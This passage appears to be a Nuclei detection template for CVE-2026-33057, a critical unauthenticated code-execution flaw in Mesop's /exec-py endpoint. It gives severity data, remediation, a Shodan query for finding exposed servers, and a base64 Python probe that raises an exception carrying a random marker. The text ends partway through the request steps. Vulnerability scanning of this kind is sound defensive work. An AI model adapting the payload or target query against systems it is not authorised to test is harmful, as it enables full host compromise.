id: CVE-2026-33057 info: name: Mesop AI Sandbox <= 1.2.2 - Remote Code Execution author: sammiee5311,liyander severity: critical description: | Mesop <= 1.2.2 contains an unrestricted remote code execution caused by unauthenticated ingestion and execution of base64-encoded Python code in the /exec-py endpoint of ai/testing module, letting attackers execute arbitrary commands on the host, exploit requires HTTP access to the server. impact: | Attackers can execute arbitrary commands on the host, leading to full system compromise. remediation: | Upgrade to version 1.2.3 or later. reference: - https://github.com/mesop-dev/mesop/security/advisories/GHSA-gjgx-rvqr-6w6v - https://nvd.nist.gov/vuln/detail/CVE-2026-33057 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2026-33057 epss-score: 0.05289 epss-percentile: 0.91574 cwe-id: CWE-94 metadata: verified: true max-request: 2 vendor: mesop-dev product: mesop shodan-query: html:"Mesop" tags: cve,cve2026,mesop,rce,oss variables: marker: "{{rand_base(16)}}" payload: '{{replace(replace(base64(concat("raise Exception(\"", marker, "\")")), "+", "-"), "/", "_")}}' flow: http(1) && http(2) http: - method: GET path: - "{{BaseURL}}" matchers: - type: dsl dsl: - 'status_code == 200' - 'contains_all(body, "